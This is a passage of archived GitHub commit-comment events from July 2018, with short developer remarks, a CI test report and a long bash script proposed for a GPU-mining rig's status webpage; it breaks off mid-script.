space.\r\n"}},"created_at":"2018-07-14T15:00:05Z"}
{"id":"7965902270","type":"CommitCommentEvent","actor":{"login":"SmallOyster"},"repo":{"name":"ddawx123/hzmtr"},"payload":{"comment":{"id":29709592,"position":null,"line":null,"path":null,"commit_id":"75a6bc26bee84f973489fcfa7f2ad9c694677117","created_at":"2018-07-14T15:00:06Z","updated_at":"2018-07-14T15:00:06Z","author_association":"NONE","body":"这不是跟那个gzmtr一样的吗:joy:"}},"created_at":"2018-07-14T15:00:06Z"}
{"id":"7965902837","type":"CommitCommentEvent","actor":{"login":"ModulesUnraveled"},"repo":{"name":"ModulesUnraveled/digitalartteacher"},"payload":{"comment":{"id":29709597,"position":null,"line":null,"path":null,"commit_id":"b65595ed0872a6ab5d91f8355c313aec5a992e11","created_at":"2018-07-14T15:00:24Z","updated_at":"2018-07-14T15:00:24Z","author_association":"OWNER","body":"Created multidev environment [digitalartteacher#ci-142](https://dashboard.pantheon.io/sites/a1a39465-2598-4d1c-9c37-d19647b48566#ci-142).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-142-digitalartteacher.pantheonsite.io/)"}},"created_at":"2018-07-14T15:00:24Z"}
{"id":"7965902960","type":"CommitCommentEvent","actor":{"login":"joshinils"},"repo":{"name":"JDAPweb/WA-project"},"payload":{"comment":{"id":29709598,"position":null,"line":null,"path":null,"commit_id":"d6a24a7ee8eddb029a9e01b676349783bf2fb935","created_at":"2018-07-14T15:00:29Z","updated_at":"2018-07-14T15:00:29Z","author_association":"COLLABORATOR","body":"@philsupertramp das problem dabei ist, dass das feld halt nicht breit sit wie das col-10 in dem es drin ist ohne das span mit irgendwelchem kram"}},"created_at":"2018-07-14T15:00:29Z"}
{"id":"7965903696","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29709599,"position":null,"line":null,"path":null,"commit_id":"b46db8d3ea2a72281a516814ec9bd4f7397ce700","created_at":"2018-07-14T15:00:59Z","updated_at":"2018-07-14T15:00:59Z","author_association":"NONE","body":"oo_boiler_refactor (drewyh) - Win64-Windows-7-VisualStudio-14: Tests Failed (2374 of 2935 tests passed, 62 test warnings)\n\nMessages:\n\n * 623 tests had: EIO diffs.\n * 557 tests had: Table big diffs.\n * 76 tests had: ESO big diffs.\n * 102 tests had: AUD diffs.\n * 156 tests had: BND diffs.\n * 151 tests had: MDD diffs.\n * 156 tests had: MTD diffs.\n * 35 tests had: MTR big diffs.\n * 151 tests had: RDD diffs.\n * 168 tests had: ESO small diffs.\n * 103 tests had: MTR small diffs.\n * 21 tests had: ERR diffs.\n * 1 test had: Table small diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 62\n * Failed: 561\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-80.89%25-red.png)</a> \n"}},"created_at":"2018-07-14T15:00:59Z"}
{"id":"7965903955","type":"CommitCommentEvent","actor":{"login":"syberant"},"repo":{"name":"splintah/game-of-life"},"payload":{"comment":{"id":29709600,"position":null,"line":null,"path":null,"commit_id":"7fb8d14ed87115fe537a993ff2d7c5f8e834832b","created_at":"2018-07-14T15:01:10Z","updated_at":"2018-07-14T15:01:10Z","author_association":"COLLABORATOR","body":"We could probably use `Rule` to support different rules when actually updating the board."}},"created_at":"2018-07-14T15:01:10Z"}
{"id":"7965904038","type":"CommitCommentEvent","actor":{"login":"marcosvitali"},"repo":{"name":"RPCS3/rpcs3"},"payload":{"comment":{"id":29709601,"position":null,"line":null,"path":null,"commit_id":"e7f30640ef5ab8ce7b3647a3dea247d5e480cd83","created_at":"2018-07-14T15:01:13Z","updated_at":"2018-07-14T15:01:13Z","author_association":"NONE","body":"AniLeo you dont understand my comment, I programmed this with a friend in dolphin fork named ishiruka 6 or 7 year ago, and all devs dolphin community destroy this feature. Is strange how a lot of time later thanks to the gamers using ishiruka this feature is aceptede when is not accurate to the hardware. Maybe kd-11 understand my comment"}},"created_at":"2018-07-14T15:01:13Z"}
{"id":"7965904200","type":"CommitCommentEvent","actor":{"login":"madhunaga17"},"repo":{"name":"madhunaga17/com.trivago.de"},"payload":{"comment":{"id":29709602,"position":null,"line":null,"path":null,"commit_id":"e647ab9f4714c71ee76ad08058f0f015acb6b4ab","created_at":"2018-07-14T15:01:19Z","updated_at":"2018-07-14T15:01:19Z","author_association":"OWNER","body":"- Creation of POM of Contact form and execution script\r\n- Windows handle method creation to handle multiple windows\r\n- TestNG xml creation for execution of multiple scripts at a time"}},"created_at":"2018-07-14T15:01:19Z"}
{"id":"7965906542","type":"CommitCommentEvent","actor":{"login":"Jackchows"},"repo":{"name":"Jackchows/Cangjie5"},"payload":{"comment":{"id":29709605,"position":115,"line":16259,"path":"Cangjie5.txt","commit_id":"8bee383b071ead9996e23fea9556049ebbc50b1a","created_at":"2018-07-14T15:03:07Z","updated_at":"2018-07-14T15:03:07Z","author_association":"OWNER","body":"不管。本就就有很多台標字形沒有收，如「感（戈竹一口心）」、「今（人一弓）」。"}},"created_at":"2018-07-14T15:03:07Z"}
{"id":"7965908571","type":"CommitCommentEvent","actor":{"login":"generic-github-user"},"repo":{"name":"generic-github-user/tfjs-visual-editor"},"payload":{"comment":{"id":29709607,"position":null,"line":null,"path":null,"commit_id":"3617da1537d412258105092833bfb754859dae67","created_at":"2018-07-14T15:04:42Z","updated_at":"2018-07-14T15:04:42Z","author_association":"OWNER","body":"And it actually works this time! Also see issue #12."}},"created_at":"2018-07-14T15:04:42Z"}
{"id":"7965909920","type":"CommitCommentEvent","actor":{"login":"downtiser"},"repo":{"name":"downtiser/python-one"},"payload":{"comment":{"id":29709611,"position":null,"line":null,"path":null,"commit_id":"294b145ffcc458893157efd8d1035761a2e2a47c","created_at":"2018-07-14T15:05:40Z","updated_at":"2018-07-14T15:05:40Z","author_association":"OWNER","body":"```\r\n#Downtiser\r\n#with 语句：避免忘记关闭文件:\r\nwith open('tank','r',encoding='utf-8') as f1,\\    \r\n    open('tank2','r',encoding='utf-8') as f2:   #代码规范，一行代码不宜超过80个字符，用\\隔开换行\r\n    for line in f1:\r\n        print(line)\r\n```\r\n    "}},"created_at":"2018-07-14T15:05:40Z"}
{"id":"7965913157","type":"CommitCommentEvent","actor":{"login":"pihug12"},"repo":{"name":"indywidualny/FaceSlim"},"payload":{"comment":{"id":29709614,"position":5,"line":121,"path":"app/src/main/java/org/indywidualni/fblite/fragment/SettingsFragment.java","commit_id":"3a10d6ba403c286b86b78bbd1b3f44a70a41db0e","created_at":"2018-07-14T15:08:08Z","updated_at":"2018-07-14T15:08:08Z","author_association":"NONE","body":"suppress"}},"created_at":"2018-07-14T15:08:08Z"}
{"id":"7965913162","type":"CommitCommentEvent","actor":{"login":"cryptatometrader44"},"repo":{"name":"papampi/nvOC_by_fullzero_Community_Release"},"payload":{"comment":{"id":29709615,"position":null,"line":null,"path":null,"commit_id":"3f6252fd62e7d92652d8d2d5358c4a6e18392a78","created_at":"2018-07-14T15:08:09Z","updated_at":"2018-07-14T15:08:09Z","author_association":"COLLABORATOR","body":"I propose these rearrangements on this webinfo page : \r\n1/ Adding some titles for sections i cut.\r\n2/ Changing some colors\r\n3/ Adding some WTM variables\r\n4/ Increase displayed WTM auto switchs \r\n5/ Moving Defined Coreclock, Memoryclock at the end of page. If you can plce them on a line (on the loop) seperated with \" |\" (pipe) , i think it will be better.\r\n\r\n\r\n\r\n\r\n```\r\n#!/bin/bash\r\n# minerinfo written by papampi for nvOC\r\n# Rev 0002\r\n# Rev 0003: papampi, Some clean up and additions\r\n# Rev 0004: papampi, Average Hash rate for zm and ethminer\r\n# Rev 0005: LukePicci, Relocate nvOC to arbitrary install directory\r\n# Rev 0006: papampi, More average Hash rate and reported hash rate to WTM\r\n# Rev 0007: papampi, Wait for watchdog to get gpu count\r\n# Rev 0008: papampi, Individual PL, OC, MC\r\n\r\n\r\nexport PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\r\n\r\nSOURCE=\"${BASH_SOURCE[0]}\"\r\nwhile [ -h \"$SOURCE\" ]; do # resolve $SOURCE until the file is no longer a symlink\r\n  DIR=\"$( cd -P \"$( dirname \"$SOURCE\" )\" && pwd )\"\r\n  SOURCE=\"$(readlink \"$SOURCE\")\"\r\n  [[ $SOURCE != /* ]] && SOURCE=\"$DIR/$SOURCE\" # if $SOURCE was a relative symlink, we need to resolve it relative to the path where the symlink file was located\r\ndone\r\n\r\nexport NVOC=\"$( cd \"$( dirname \"$SOURCE\" )/../..\" && pwd )\"\r\n\r\nif [[ $1 == clearalerts ]]\r\nthen\r\n  echo \"\" > ${NVOC}/5_watchdoglog\r\n  echo \"\" > ${NVOC}/6_autotemplog\r\nfi\r\n\r\necho \"Content-type: text/html\"\r\necho \"\"\r\necho '<html>'\r\necho '<head>'\r\necho '<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\\n\\n\">'\r\nsource ${NVOC}/1bash\r\nsource ${NVOC}/0algo_id\r\n\r\necho '<style>; .button {background-color: black ; border: none; color: black; padding: 15px 32px;text-align: center;text-decoration: none;display: inline-block;font-size: 16px; margin: 4px 2px;cursor: pointer;}'\r\necho '</style>'\r\n\r\nnvOC_Ver=\"nvOC v0019-2.1 - Community Release\"\r\nLSB_RELEASE=$(lsb_release -s -d)\r\nUNAME=$(uname -r)\r\nSYSTEM_BOOT_TIME=$(uptime -s)\r\nSYSTEM_UP_TIME=$(uptime -p)\r\n\r\n# If number gpu installed is set in 1bash give a comparison\r\n# Reduce nvidia-smi query by trying to read from watchdog log first\r\nif ps ax | grep -q \"[5]watchdog\"\r\nthen\r\n  # Wait for Watchdog log to not give false info\r\n  if tail -10 ${NVOC}/nvoc_logs/watchdog-screenlog.0 | grep -q \"[U]tilization:\"\r\n  then\r\n    DETECTED_GPUS=$(( $(tail -30 ${NVOC}/nvoc_logs/watchdog-screenlog.0 | grep -o \"GPU[0-9]*\" | sed 's/GPU//' | sort -nr | head -1) + 1 ))\r\n    if [[ -n \"$NUMBER_GPUS_INSTALLED\"  ]]\r\n    then\r\n      if [[ $DETECTED_GPUS -ne $NUMBER_GPUS_INSTALLED ]]\r\n      then\r\n        GPU_COUNT=\"<tt style=\\\"text-align:left; color:red\\\"> $DETECTED_GPUS</tt>\"\r\n      else\r\n        GPU_COUNT=$DETECTED_GPUS\r\n      fi\r\n    else\r\n      GPU_COUNT=$DETECTED_GPUS\r\n    fi\r\n  else\r\n    GPU_COUNT=\"Waiting for Watchdog info\"\r\n  fi\r\nelse\r\n  if [[ -n \"$NUMBER_GPUS_INSTALLED\"  ]]\r\n  then\r\n    DETECTED_GPUS=$(nvidia-smi -i 0 --query-gpu=count --format=csv,noheader,nounits)\r\n    if [[ $DETECTED_GPUS -ne $NUMBER_GPUS_INSTALLED ]]\r\n    then\r\n      GPU_COUNT=\"<tt style=\\\"text-align:left; color:red\\\">$DETECTED_GPUS</tt>\"\r\n    else\r\n      GPU_COUNT=$DETECTED_GPUS\r\n    fi\r\n  else\r\n    GPU_COUNT=$DETECTED_GPUS\r\n  fi\r\nfi\r\n\r\nif [[ $GPU_COUNT =~ ^[0-9.]+$ ]]\r\nthen\r\n  TAIL_GPU_COUNT=$(( GPU_COUNT + 3 ))\r\nelse\r\n  TAIL_GPU_COUNT=\"10\"\r\nfi\r\n\r\nREBOOT_REQUIRED=$( [ -f /var/run/reboot-required ]  && echo \"<tt style=\\\"text-align:left; color:red\\\">\"YES!!!\"</tt>\" || echo \"No\")\r\nMINER_PID=$(pgrep -f -o  miner)\r\nMINER_UP_TIME=$(ps -p $MINER_PID  -o etime | grep -v ELAPSED)\r\nTEMP_FAN_POWER=$(tail  -50 ${NVOC}/nvoc_logs/tempcontrol-screenlog.0  | grep GPU | awk '{gsub(/:/,\": \")}1' |tail -n $GPU_COUNT | sed -r 's/\\x1B\\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g'  | awk '{print $0,\"<br>\"}' )\r\nTEMP_ALERT_LOG=$(cat ${NVOC}/6_autotemplog | awk '{print $0,\"<br>\"}')\r\nWDOG_ALERT_LOG=$(cat ${NVOC}/5_watchdoglog | awk '{print $0,\"<br>\"}')\r\n#NIVIDIA_VERSION=$(nvidia-smi -i 0 --query-gpu=driver_version --format=csv,noheader)\r\nNIVIDIA_VERSION=$(cat /proc/driver/nvidia/version | grep -o \"Module.*\" | awk '{print $2}')\r\nDISK=$(df -h / | awk '{ a = $2 } END { print a }')\r\nDISK_FREE=$(df -h / | awk '{ a = $4 } END { print a }')\r\nMEMORY=$(free -m | head -n 2 | tail -n 1 | awk {'print $2'})\r\nFREE_MEMORY=$(free -m | head -n 2 | tail -n 1 | awk {'print $4'})\r\nCPU=$(cat /proc/cpuinfo | grep 'model name' | head -1 | cut -d':' -f2)\r\nMINER_CMD=$(ps ax | grep -i screen | grep miner | grep -o 'miners.*')\r\nMINER_LOG=$(tail -n $(( $TAIL_GPU_COUNT * 2 )) ${NVOC}/nvoc_logs/screenlog.0 |  sed -r 's/\\x1B\\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g' |  awk '{print $0,\"<br>\"}')\r\neval 'COIN_POOL=${COIN}_POOL'\r\n\r\n# OC, MC, PL\r\nif [[ $AUTO_SWITCH != SALFTER* ]]\r\nthen\r\n  if [[ $POWERLIMIT_MODE == GLOBAL ]]\r\n  then\r\n    GPU_PL=$_POWERLIMIT_WATTS\r\n  elif [[ $POWERLIMIT_MODE == ALGO_SPECIFIC ]]\r\n  then\r\n    eval 'ALGO_PL=${ALGO}_POWERLIMIT_WATTS'\r\n    GPU_PL=${!ALGO_PL}\r\n  fi\r\n\r\n  if [[ $OVERCLOCK_MODE == GLOBAL ]]\r\n  then\r\n    GPU_OC=$_CORE_OVERCLOCK\r\n    GPU_MC=$_MEMORY_OVERCLOCK\r\n  elif [[ $OVERCLOCK_MODE == ALGO_SPECIFIC ]]\r\n  then\r\n    eval 'ALGO_OC=${ALGO}_CORE_OVERCLOCK'\r\n    eval 'ALGO_MC=${ALGO}_MEMORY_OVERCLOCK'\r\n    GPU_OC=${!ALGO_OC}\r\n    GPU_MC=${!ALGO_MC}\r\n  fi\r\nelif [[ $AUTO_SWITCH == SALFTER* ]]\r\nthen\r\n  GPU_PL=\"Salfter Switcher not supported in webinfo\"\r\n  GPU_OC=\"Salfter Switcher not supported in webinfo\"\r\n  GPU_MC=\"Salfter Switcher not supported in webinfo\"\r\nfi\r\n\r\n# Reduce nvidia-smi query by trying to read from watchdog log first\r\nif ps ax | grep -q \"[5]watchdog\"\r\nthen\r\n  GPU_UTILIZATIONS=$(tail -$TAIL_GPU_COUNT ${NVOC}/nvoc_logs/watchdog-screenlog.0  | grep -o \"GPU[0-9]* Utilization: [0-9]*%\" | tail -$GPU_COUNT | sed  's/ Utilization//' |sed  's/: /:/'| paste -s )\r\nelse\r\n  GPU_UTILIZATIONS=$(nvidia-smi --query-gpu=utilization.gpu --format=csv,noheader,nounits)\r\nfi\r\n\r\n# Red load average if its higher than cpu core count\r\nCORE=$(nproc)\r\nAVERAGES=$(uptime | sed 's/.*: //g; s/ //g')\r\n\r\nAVERAGE_1=$(echo \"$AVERAGES\" | cut -d\",\" -f1)\r\nif (( $(echo  \"$AVERAGE_1 > $CORE\"  | bc -l) ))\r\nthen\r\n  AVRG_1=\"<tt style=\\\"text-align:left; color:red\\\"> $AVERAGE_1</tt>\"\r\nelse\r\n  AVRG_1=\"$AVERAGE_1\"\r\nfi\r\nAVERAGE_5=$(echo \"$AVERAGES\" | cut -d\",\" -f2)\r\nif (( $(echo  \"$AVERAGE_5 > $CORE\"  | bc -l) ))\r\nthen\r\n  AVRG_5=\"<tt style=\\\"text-align:left; color:red\\\"> $AVERAGE_5</tt>\"\r\nelse\r\n  AVRG_5=\"$AVERAGE_5\"\r\nfi\r\nAVERAGE_15=$(echo \"$AVERAGES\" | cut -d\",\" -f3)\r\nif (( $(echo  \"$AVERAGE_15 > $CORE\"  | bc -l) ))\r\nthen\r\n  AVRG_15=\"<tt style=\\\"text-align:left; color:red\\\"> $AVERAGE_15</tt>\"\r\nelse\r\n  AVRG_15=\"$AVERAGE_15\"\r\nfi\r\n\r\n# If number gpu installed is set in 1bash give a comparison\r\nif [[ -n \"$NUMBER_GPUS_INSTALLED\"  ]]\r\nthen\r\n  if [[ $(nvidia-smi -i 0 --query-gpu=count --format=csv,noheader,nounits) -ne $NUMBER_GPUS_INSTALLED ]]\r\n  then\r\n    GPU_COUNT=\"<tt style=\\\"text-align:left; color:red\\\">$(nvidia-smi -i 0 --query-gpu=count --format=csv,noheader,nounits)</tt>\"\r\n  else\r\n    GPU_COUNT=$(nvidia-smi -i 0 --query-gpu=count --format=csv,noheader,nounits)\r\n  fi\r\nelse\r\n  GPU_COUNT=$(nvidia-smi -i 0 --query-gpu=count --format=csv,noheader,nounits)\r\nfi\r\n\r\nif [[ $MINER_TEMP_CONTROL == YES ]]\r\nthen\r\n  AUTO_TEMPERATURE_CONTROL=\"Enabled,\"\r\n  if ps aux | grep -v grep | grep -q 6tempcontrol\r\n  then\r\n    TEMP_CHECK=\" Running\"\r\n  else\r\n    TEMP_CHECK=\"<tt style=\\\"text-align:left; color:red\\\"> Not Running</tt>\"\r\n  fi\r\n  if (( $(stat -c%s \"${NVOC}/6_autotemplog\") > 1 )); then\r\n    TEMP_WARNING=\"<tt style=\\\"text-align:left; color:red\\\">, WARNING</tt>\"\r\n  else\r\n    TEMP_WARNING=\", No Warning\"\r\n  fi\r\nelse\r\n  AUTO_TEMPERATURE_CONTROL=\"<tt style=\\\"text-align:left; color:red\\\">Disabled</tt>\"\r\nfi\r\n\r\nif [[ $MINER_WATCHDOG == YES ]]\r\nthen\r\n  WATCHDOG=\"Enabled,\"\r\n  if ps aux | grep -v grep | grep -q 5watchdog\r\n  then\r\n    WDOG_CHECK=\" Running\"\r\n  else\r\n    WDOG_CHECK=\"<tt style=\\\"text-align:left; color:red\\\"> Not Running</tt>\"\r\n  fi\r\n  if (( $(stat -c%s \"${NVOC}/5_watchdoglog\") > 1 )); then\r\n    WATCHDOG_WARNING=\"<tt style=\\\"text-align:left; color:red\\\">, WARNING</tt>\"\r\n  else\r\n    WATCHDOG_WARNING=\", No Warning\"\r\n  fi\r\nelse\r\n  WATCHDOG=\"<tt style=\\\"text-align:left; color:red\\\">Disabled</tt>\"\r\nfi\r\n\r\nmbvendor=$(cat /sys/devices/virtual/dmi/id/board_vendor)\r\nmbmodel=$(cat /sys/devices/virtual/dmi/id/board_name)\r\nmbversion=$(cat /sys/devices/virtual/dmi/id/board_version)\r\nbiosver=$(cat /sys/devices/virtual/dmi/id/bios_version)\r\nbiosdate=$(cat /sys/devices/virtual/dmi/id/bios_date)\r\nif [[ $mbvendor == ASUSTeK* ]]; then mbvendor=\"ASUS\"; fi\r\nif [[ $mbvendor == BIOSTAR* ]]; then mbvendor=\"BIOSTAR\"; fi\r\n\r\n#################################################################\r\n########### Auto Switch History and current mining ##############\r\n\r\nif [[ $AUTO_SWITCH == SALFTER_MPH_SWITCHING ]]\r\nthen\r\n  CURRENT_COIN=$(head -n 1 ${NVOC}/current-profit)\r\n  MINING_HISTORY=$(tail -n 5 ${NVOC}/algo_log |  awk '{print $0,\"<br>\"}')\r\n  AUTO_SWITCH_TEXT=\"Salfter MPH Auto Switch\"\r\n\r\nelif [[ $AUTO_SWITCH == SALFTER_NICEHASH_SWITCHING ]]\r\nthen\r\n  CURRENT_COIN=$(head -n 1 ${NVOC}/current-profit)\r\n  MINING_HISTORY=$(tail -n 5 ${NVOC}/algo_log |  awk '{print $0,\"<br>\"}')\r\n  AUTO_SWITCH_TEXT=\"Salfter Nicehash Auto Switch\"\r\n\r\nelif [[ $AUTO_SWITCH == SALFTER_PROGRAMATIC_SWITCHING ]]\r\nthen\r\n  CURRENT_COIN=$(head -n 1 ${NVOC}/current-profit)\r\n  MINING_HISTORY=$(tail -n 5 ${NVOC}/algo-log |  awk '{print $0,\"<br>\"}')\r\n  AUTO_SWITCH_TEXT=\"Salfter Programatic Switch\"\r\n\r\nelif [[ $AUTO_SWITCH == WTM_SWITCHING ]]\r\nthen\r\n  CURRENT_COIN=$COIN\r\n  MINING_HISTORY=$(cat ${NVOC}/WTM_switch_history | grep 'Mining switched'|tail -n 25 |  awk '{print $0,\"<br>\"}')\r\n  P_MINING_HISTORY=\"$MINING_HISTORY <br>\"\r\n  WTM_PROFIT=$(cat ${NVOC}/WTM_current_profit | awk '{print $0,\"%\"}')\r\n  P_WTM_PROFIT=\"$WTM_PROFIT <br>\"\r\n  WTM_REV=$(cat ${NVOC}/WTM_current_revenue | awk '{print $0,\"\"}')\r\n  P_WTM_REV=$\"$WTM_REV <br>\"\r\n  WTM_AVERAGE_REV=$(awk '{s+=$1}END{print \"\",s/NR}' RS=\"\\n\"  ${NVOC}/WTM_24H_REV)\r\n  P_WTM_AVERAGE_REV=\"$WTM_AVERAGE_REV <br>\"\r\n  BTC_PRICE_VALUE=$(cat ${NVOC}/WTM_BTC_EXCHANGE_RATE | awk '{printf(\"%d\\n\",$1 + 0)}' )\r\n  BTC_PRICE=\"BTC PRICE: \"\r\n  WTM_Current_Profitabilty=\"WTM Current Profitability:\"\r\n  WTM_Current_Revenue=\"WTM Current Revenue: \"\r\n  Average_Revenue=\"24H Average Revenue: \"\r\n  LAST_10_AUTO_SWITCHES=\"<br> LAST 25 AUTO SWITCHES: <br>\"\r\n  WTM_HASHRATE=\"WTM URL Hash Rate: \"\r\n\r\n  if ps aux | grep -v grep | grep -q 8wtm_auto_switch\r\n  then\r\n    WTM_SWITCH=\"Running\"\r\n  else\r\n    WTM_SWITCH=\"<tt style=\\\"text-align:left; color:red\\\">Not Running</tt>\"\r\n  fi\r\n\r\n#if python script syncing\r\n  if ps aux | grep -v grep | grep -q WTM_SWITCHER\r\n  then\r\n    WTM_A_S=\"Syncing data with WTM.com\"\r\n  fi\r\n  AUTO_SWITCH_TEXT=\"WTM Auto Switch $WTM_SWITCH $WTM_A_S\"\r\n\r\n\r\nelif [[ $WTM_PROFIT_CHECK == YES && $AUTO_SWITCH == \"NO\" ]]\r\nthen\r\n  CURRENT_COIN=$COIN\r\n  MINING_HISTORY=\"\"\r\n  WTM_PROFIT=$(cat ${NVOC}/WTM_current_profit | awk '{print $0,\"%\"}')\r\n  P_WTM_PROFIT=\"$WTM_PROFIT <br>\"\r\n  WTM_REV=$(cat ${NVOC}/WTM_current_revenue | awk '{print $0,\"\"}')\r\n  P_WTM_REV=$\"$WTM_REV <br>\"\r\n  WTM_SWITCH=\"WTM Profit Check Running. \"\r\n  BTC_PRICE_VALUE=$(cat ${NVOC}/WTM_BTC_EXCHANGE_RATE | awk '{printf(\"%d\\n\",$1 + 0)}')\r\n  BTC_PRICE=\"BTC PRICE: \"\r\n  WTM_AVERAGE_REV=\"\"\r\n  WTM_Current_Profitabilty=\"WTM Current Profitability: \"\r\n  WTM_Current_Revenue=\"WTM Current Revenue: \"\r\n  Average_Revenue=\"\"\r\n  LAST_10_AUTO_SWITCHES=\"\"\r\n  #if python script syncing\r\n  if ps aux | grep -v grep | grep -q WTM_SWITCHER\r\n  then\r\n    WTM_A_S=\"Syncing data with WTM.com\"\r\n  fi\r\n  AUTO_SWITCH_TEXT=\"$WTM_SWITCH $WTM_A_S\"\r\n\r\nelse\r\n  CURRENT_COIN=$COIN\r\n  AUTO_SWITCH_TEXT=\"No Auto Switch\"\r\n  MINING_HISTORY=\"\"\r\n  BTC_PRICE=\"\"\r\n  BTC_PRICE_VALUE=\"\"\r\n  WTM_PROFIT=\"\"\r\n  WTM_REV=\"\"\r\n  WTM_AVERAGE_REV=\"\"\r\n  WTM_CURRENCY=\"\"\r\n  LAST_10_AUTO_SWITCHES=\"\"\r\n  WTM_Current_Profitabilty=\"\"\r\n  WTM_Current_Revenue=\"\"\r\nfi\r\n\r\n##################################################################\r\n########################### Average Hash Rate ####################\r\n\r\nif  ps ax | grep -q \"[z]m_miner\"\r\nthen\r\n  total_hash=$(tail -100 ${NVOC}/nvoc_logs/screenlog.0 | grep \"==========\" | grep -o \"[0-9]*.[0-9]* Sol/s\" | awk '{print $1}' | awk '{s+=$1} END {printf \"%.0f\", s}')\r\n  hash_count=$(tail -100 ${NVOC}/nvoc_logs/screenlog.0 | grep \"==========\" | grep -v grep | wc -l | awk '{print $1}')\r\n  HASH_AVERAGE=\"$((total_hash / hash_count)) Sols/s\"\r\n\r\nelif  ps ax | grep -q \"[e]thminer\"\r\nthen\r\n  total_hash=$(tail -100 ${NVOC}/nvoc_logs/screenlog.0 | grep \"Speed\" | sed -r 's/\\x1B\\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g' | grep -o '[0-9]*.[0-9]* Mh/s' | awk '{print$1}' | awk '{s+=$1} END {printf \"%.0f\", s}')\r\n  hash_count=$(tail -100 ${NVOC}/nvoc_logs/screenlog.0 | grep \"Speed\" | grep -v grep | wc -l | awk '{print $1}')\r\n  HASH_AVERAGE=\"$((total_hash / hash_count)) MH/s\"\r\n\r\nelif  ps ax |  grep -q \"[c]laymore\"\r\nthen\r\n  total_hash=$(tail -100 ${NVOC}/nvoc_logs/screenlog.0 | grep \"Total Speed:\" | grep -v grep | sed -r 's/\\x1B\\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g' | awk '{print $5}' | awk '{s+=$1} END {printf \"%.0f\", s}')\r\n  hash_count=$(tail -100 ${NVOC}/nvoc_logs/screenlog.0 | grep \"Total Speed:\" | grep -v grep | wc -l | awk '{print $1}')\r\n  HASH_AVERAGE=\"$((total_hash / hash_count)) MH/s\"\r\n\r\nelif  ps ax | grep -q \"[K]Tccminer\"\r\nthen\r\n  if tail -20 ${NVOC}/nvoc_logs/screenlog.0 | grep -q \"[k]H/s\"\r\n  then\r\n    total_hash=$(tail -100 ${NVOC}/nvoc_logs/screenlog.0 | grep \"accepted\" | sed -r 's/\\x1B\\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g' | grep -o \"[0-9]*.[0-9]* kH/s\" | awk '{print $1}' | awk '{s+=$1} END {printf \"%.0f\", s}')\r\n    hash_count=$(tail -100 ${NVOC}/nvoc_logs/screenlog.0 | grep \"accepted\" | grep -v grep |  wc -l | awk '{print $1}')\r\n    HASH_AVERAGE=\"$((total_hash / hash_count)) kH/s\"\r\n  elif tail -20 ${NVOC}/nvoc_logs/screenlog.0 | grep -q \"[M]H/s\"\r\n  then\r\n    total_hash=$(tail -100 ${NVOC}/nvoc_logs/screenlog.0 | grep \"accepted\" | sed -r 's/\\x1B\\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g' | grep -o \"[0-9]*.[0-9]* MH/s\" | awk '{print $1}' | awk '{s+=$1} END {printf \"%.0f\", s}')\r\n    hash_count=$(tail -100 ${NVOC}/nvoc_logs/screenlog.0 | grep \"accepted\" | grep -v grep |  wc -l | awk '{print $1}')\r\n    HASH_AVERAGE=\"$((total_hash / hash_count)) MH/s\"\r\n  fi\r\n\r\nelif  ps ax | grep -q \"[T]Pccminer\"\r\nthen\r\n  if tail -20 ${NVOC}/nvoc_logs/screenlog.0 | grep -q \"[M]H/s\"\r\n  then\r\n    total_hash=$(tail -100 ${NVOC}/nvoc_logs/screenlog.0 | grep \"accepted\" | sed -r 's/\\x1B\\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g' | grep -o \"[0-9]*.[0-9]* MH/s\" | awk '{print $1}' | awk '{s+=$1} END {printf \"%.0f\", s}')\r\n    hash_count=$(tail -100 ${NVOC}/nvoc_logs/screenlog.0 | grep \"accepted\" | grep -v grep |  wc -l | awk '{print $1}')\r\n    HASH_AVERAGE=\"$((total_hash / hash_count)) MH/s\"\r\n  elif tail -20 ${NVOC}/nvoc_logs/screenlog.0 | grep -q \"[k]H/s\"\r\n  then\r\n    total_hash=$(tail -100 ${NVOC}/nvoc_logs/screenlog.0 | grep \"accepted\" | sed -r 's/\\x1B\\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g' | grep -o \"[0-9]*.[0-9]* kH/s\" | awk '{print $1}' | awk '{s+=$1} END {printf \"%.0f\", s}')\r\n    hash_count=$(tail -100 ${NVOC}/nvoc_logs/screenlog.0 | grep \"accepted\" | grep -v grep |  wc -l | awk '{print $1}')\r\n    HASH_AVERAGE=\"$((total_hash / hash_count)) kH/s\"\r\n  fi\r\n\r\nelif  ps ax | grep -q \"[s]uprminer\"\r\nthen\r\n  total_hash=$(tail -100 ${NVOC}/nvoc_logs/screenlog.0 | grep \"accepted\" | sed -r 's/\\x1B\\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g' | grep -o \"[0-9]*.[0-9]* MH/s\" | awk '{print $1}' | awk '{s+=$1} END {printf \"%.0f\", s}')\r\n  hash_count=$(tail -100 ${NVOC}/nvoc_logs/screenlog.0 | grep \"accepted\" | grep -v grep |  wc -l | awk '{print $1}')\r\n  HASH_AVERAGE=$((total_hash / hash_count))\r\n\r\nelif  ps ax | grep -q \"[b]miner\"\r\nthen\r\n  total_hash=$(tail -100 ${NVOC}/nvoc_logs/screenlog.0 | grep -o \"Total [0-9]*\" | awk '{print $2}' | awk '{s+=$1} END {printf \"%.0f\", 